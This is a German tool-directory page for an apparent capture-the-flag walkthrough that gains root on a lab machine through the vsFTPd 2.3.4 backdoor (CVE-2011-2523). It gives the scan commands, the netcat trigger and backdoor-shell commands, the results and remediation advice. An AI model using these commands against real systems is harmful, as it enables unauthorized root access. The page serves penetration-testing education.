Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
PwnTillDawn-Portal-Walkthrough — Eine detaillierte Penetrationstest-Durchführung und Exploit-Bericht für die 'Portal'-Maschine, mit Fokus auf CVE-2011-2523 (vsFTPd 2.3.4 Backdoor), um Root-Zugriff zu erlangen. | Kitploit
Tools/GitHubGitHub/tr00jan99/pwntilldawn-portal-walkthrough
Privilege EscalationAufklärungSchwachstellenanalyseExploitationPost-ExploitationCTFPenetrationstestsLernen & Bildung

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
GitHub
tr00jan99/pwntilldawn-portal-walkthrough

PwnTillDawn-Portal-Walkthrough

Eine detaillierte Penetrationstest-Durchführung und Exploit-Bericht für die 'Portal'-Maschine, mit Fokus auf CVE-2011-2523 (vsFTPd 2.3.4 Backdoor), um Root-Zugriff zu erlangen.

Repository anzeigen
vor 5 MonatenNoch nicht geprüft

🔐 Sicherheitsbewertung und Penetrationstest (VAPT)

📌 Projekt: Walkthrough zur Zielausnutzung

⚠️ Dieses Projekt ist ausschließlich zu Bildungs- und autorisierten Testzwecken bestimmt.
Unbefugter Zugriff auf Systeme ist strengstens untersagt.


👨‍💻 Autor

SYAFIQ
Rolle: Leitender Penetrationstester


🎯 Zielinformationen

  • Ziel-IP: 10.150.150.12
  • Betriebssystem: Ubuntu Linux
  • Status: 🔴 KRITISCH (Backdoor erkannt)
  • Schwachstelle: CVE-2011-2523 (vsFTPd Backdoor)

🧭 Angriffsübersicht

PhaseWerkzeugBeschreibung
ErkundungNmapNetzwerk nach aktiven Hosts scannen
AufzählungNmapDienste und Versionen identifizieren
AnalyseNSE-SkriptBekannte Schwachstelle erkennen
AusnutzungNetcatBackdoor auslösen
Post-ExploitationTerminalRoot-Zugriff erlangen und Flagge abrufen

🚀 Schritt-für-Schritt-Walkthrough

🔍 Schritt 1: Netzwerkerkundung

Nach aktiven Hosts im Netzwerk scannen:

root@kitploit:~
nmap -sn --unprivileged 10.150.150.10-30

✅ Ergebnis:

-8 Hosts erkannt -Ziel identifiziert: 10.150.150.12

🔎 Schritt 2: Dienstaufzählung

Offene Ports und Dienste scannen:

root@kitploit:~
nmap -Pn -F --unprivileged -sV 10.150.150.12

✅ Ergebnisse:

-Port 21 → FTP (vsftpd) -Port 22 → SSH (OpenSSH 8.2p1)

⚠️ Schritt 3: Schwachstellenscan

Auf bekannte FTP-Backdoor-Schwachstelle prüfen:

root@kitploit:~
nmap -Pn --unprivileged -p21 --script ftp-vsftpd-backdoor 10.150.150.12

🚨 Ergebnis:

-Ziel ist VERWUNDBAR -CVE-2011-2523 bestätigt

💣 Schritt 4: Ausnutzung

Backdoor mit bösartigem Benutzernamen auslösen:

root@kitploit:~
(echo "USER hello:)"; echo "PASS password"; sleep 1) | nc -nv 10.150.150.12 21

⚡ Dies öffnet eine versteckte Root-Shell auf Port 6200

🔓 Schritt 5: Zugriff erlangen (Root-Shell)

Mit der Backdoor verbinden und Befehle ausführen:

root@kitploit:~
(echo "id; cat /root/FLAG1.txt"; sleep 1) | nc -nv 10.150.150.12 6200

✅ Ergebnis:

Root-Zugriff erlangt uid=0(root) bestätigt

🏁 Flagge erbeutet:

root@kitploit:~
5ee499eb5d0b8e4269b13483e57adaa0b3815f48

🧠 Wichtige Erkenntnisse

Immer veraltete Dienste aktualisieren (vsFTPd war verwundbar) Fehlkonfigurierte Dienste können zur vollständigen Systemkompromittierung führen Einfache Scans können kritische Schwachstellen aufdecken -🛡️ Empfehlungen -🔄 FTP-Dienst auf die neueste Version aktualisieren -🚫 Unnötige Dienste deaktivieren -🔐 Firewall verwenden, um Zugriff einzuschränken -📊 Regelmäßige Sicherheitsaudits durchführen -📚 Haftungsausschluss

Dieses Projekt ist ausschließlich erstellt für:

Cybersicherheit lernen Ethische Hacking-Übungen Autorisierte Penetrationstests

❌ Verwenden Sie dieses Wissen NICHT für illegale Aktivitäten.

⭐ Abschließende Anmerkung

“Sicherheit ist kein Produkt, sondern ein Prozess.” — Testen, überwachen und verbessern Sie immer.

Tool herunterladen